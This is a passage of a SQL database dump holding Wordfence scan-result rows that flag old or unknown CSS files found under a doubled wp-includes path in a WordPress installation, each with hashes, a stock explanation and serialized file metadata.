WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/edit-post/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77305,1675048819,1675048819,'new','knownfile',25,'2c0724e10a7fbe3aa5110e5079fb397c','a6e5c4c3c87db2d381281439e9a0402a','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77306,1675048819,1675048819,'new','knownfile',25,'cc4149e853f0eda0743883792383841d','83a884b0b6fd5faed7b2e2b612007cfe','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77307,1675048819,1675048819,'new','knownfile',25,'8200247f971138f765517b8982c0e027','a847f74bcb1028b4b959474edf621fe4','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/editor/editor-styles.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77308,1675048819,1675048819,'new','knownfile',25,'6ae70aa028d1da45b610694fd0d94813','5fd2ebc5cf7d580dd6fcfe2bb52f3ca5','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/editor/editor-styles.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77309,1675048819,1675048819,'new','knownfile',75,'3457d93b88728955ad8eb8d8c08003ea','ab57a0886aa736a5a30d178fa398e06b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/editor/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77310,1675048819,1675048819,'new','knownfile',75,'55873620d67e190d1c9adcd21c07af75','e0ab156e9e46ff71903fac0f74b5edb6','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/editor/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77311,1675048819,1675048819,'new','knownfile',75,'186a67a6b6496b34af6bf60b81e27ed9','70d39054fe5b25448a0d9275bab4faed','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/dist/editor/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77312,1675048819,1675048819,'new','knownfile',75,'7593ce491704d2934ae82ff09d14384f','c632c50e645c7f3f7486d65179795113','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/editor/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77313,1675048819,1675048819,'new','knownfile',75,'779a3f303387a04c3eaeddce2b0756c5','c5d3a26785c8e46dde5b1bcf7349f8f4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/format-library/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77314,1675048819,1675048819,'new','knownfile',75,'b51b772cf7cc273d2be29f1f40ece5d8','c57ddee0ee2d846c78ff37571fe577f4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77315,1675048820,1675048820,'new','knownfile',75,'26d6a80591bafa5ddb59cbf90390bc4f','0edd21f624e5e6ad657857cedbf46387','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/format-library/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77316,1675048820,1675048820,'new','knownfile',75,'8eeffa5038180d505ef25042bfe04717','fc0a9f126ba997b6ef9d1fdfad9fbf4a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/format-library/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77317,1675048820,1675048820,'new','knownfile',75,'bf3ebc270cfd0200471c9645a2c09011','88b54d5cbeb737fcfc469e268f760b9d','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77318,1675048820,1675048820,'new','knownfile',75,'59d35f6fea1d95e926099b4c0497c6d6','4037f6a08c4b8409c28d3a9b49cf6dc4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77319,1675048820,1675048820,'new','knownfile',75,'bfb5176d7cabad2cb638324d923d6f38','e519a06c916cca9cca101e99efa0465a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77320,1675048820,1675048820,'new','knownfile',75,'092e7139564694d7e9219e4e4ca8821e','1b2269bda2aa333c5d1d918232bf7c1f','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77321,1675048820,1675048820,'new','knownfile',75,'df538fcba5354b4ae77cdfc0f12a4d06','d74c907d99fa2a9a4696cec7b15a19ff','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/dist/nux/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77322,1675048820,1675048820,'new','knownfile',75,'e3325e0490d8648794a0262e20f85396','b5fd656507cbd6ed7213ee6c207a2d89','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/css/dist/nux/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77323,1675048820,1675048820,'new','knownfile',75,'7950ff61dd831ffce5a38cfc0ab4d05f','d8f78cad995582e8229b7a352e8d93c0','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/dist/nux/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77324,1675048820,1675048820,'new','knownfile',75,'f2fd4fb420f885c1505034bed755ecc2','db72b4c749e6a2b6db8a3d7ce8da5a24','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/dist/nux/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77325,1675048820,1675048820,'new','knownfile',75,'a48b1637b75e288646610deca452cab0','600ce8b1ddfaecdf9d8520b17518652c','Unknown file in WordPress core: wp-includes/wp-includes/css/editor-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/editor-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77326,1675048820,1675048820,'new','knownfile',75,'8ad11f7640c69f885cf2bf352c80884a','170917219f56ea80bbec3a260af2d0bc','Unknown file in WordPress core: wp-includes/wp-includes/css/editor-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/editor-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77327,1675048820,1675048820,'new','knownfile',75,'c4ffba0e56d6d86ab3c8f498134e81ef','2bb372a8cc1df38792abade6cfa7aea2','Unknown file in WordPress core: wp-includes/wp-includes/css/editor.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/css/editor.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77328,1675048821,1675048821,'new','knownfile',75,'5e85f1aaf55961a028127c052faa7e6a','9a665e4b65e86bb87377c31bcdd44de3','Unknown file in WordPress core: wp-includes/wp-includes/css/editor.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/editor.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77329,1675048821,1675048821,'new','knownfile',75,'9353242e6e9054ecfb903d32ed3ce6ea','2410b5b6757e18ff1d0b65e00fa2ecc9','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77330,1675048821,1675048821,'new','knownfile',75,'59c2a41b716444b66b275e17b26615e3','515ee037941738562a8a6a7d43477c40','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77331,1675048821,1675048821,'new','knownfile',75,'f7187fca3d1a9ef150ffd79f16cfa919','35c88ea9ca93ca02a7605b3200971b02','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/css/jquery-ui-dialog.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77332,1675048821,1675048821,'new','knownfile',75,'082c0444f3bf02c697ba9dde86d6482b','feba99d2a0739fc2726284725ad8cc02','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/jquery-ui-dialog.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77333,1675048821,1675048821,'new','knownfile',75,'da555cfbd79026720ec3a94ffb307574','c68c27f236835c4d8fb269042e34a510','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/media-views-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77334,1675048821,1675048821,'new','knownfile',75,'23b98203bad9406ff34ee80a0797ab9c','ab2289198cfd394ab388519fc4627f78','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/css/media-views-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77335,1675048821,1675048821,'new','knownfile',75,'c2a46a16fbecf04dfa30132dbb995ab7','9c612d9b11ef14e9780555accb2639c4','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/media-views.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77336,1675048821,1675048821,'new','knownfile',75,'4fd31a2d6726d0ebb57ccaac2ce5093d','79b364ef4c7b8277b45b245e1b8e1a35','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/media-views.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77337,1675048821,1675048821,'new','knownfile',75,'9b56defa82dd1a0612202d500fb781d8','1b82ca4491a5a89270da550ed695dbc2','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-auth-check-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77338,1675048821,1675048821,'new','knownfile',75,'2c8649e68c28f59378e809d787caaafd','d2d685bf9a8cc5de3337330d2bba156a','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/wp-auth-check-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77339,1675048821,1675048821,'new','knownfile',75,'ec4ac91840f41d7da23f95d9fb03f536','31e1c538bd22b276377925f880e775ac','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/wp-auth-check.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77340,1675048821,1675048821,'new','knownfile',75,'ae911e169f4901d2b96280555dc27931','19a10223d581607328008aac0d85cafb','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-auth-check.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77341,1675048821,1675048821,'new','knownfile',75,'f83970a07f6149653fe75e9cd8144ed3','db3577868892545ca1332cef9cd1955e','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template-ie.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/wp-embed-template-ie.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77342,1675048821,1675048821,'new','knownfile',75,'d62494a3ecc5dc1797c103af7d21eb7e','e6d683438ca25b8a1be923487c188aec','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template-ie.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" 